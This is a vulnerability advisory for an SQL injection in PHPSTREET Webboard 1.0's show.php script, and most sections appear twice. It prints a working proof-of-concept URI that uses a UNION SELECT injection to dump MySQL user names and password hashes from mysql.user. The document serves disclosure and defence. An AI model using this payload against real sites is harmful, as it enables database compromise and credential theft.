PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
BID:32635
Info
PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
| Bugtraq ID: | 32635 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 04 2008 12:00AM |
| Updated: | Dec 08 2008 11:11PM |
| Credit: | CWH Underground |
| Vulnerable: |
PHPSTREET Webboard 1.0 |
| Not Vulnerable: | |
Discussion
PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
PHPSTREET Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPSTREET Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user
Solution / Fix
PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
References:
References:
- Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability (CWH Underground )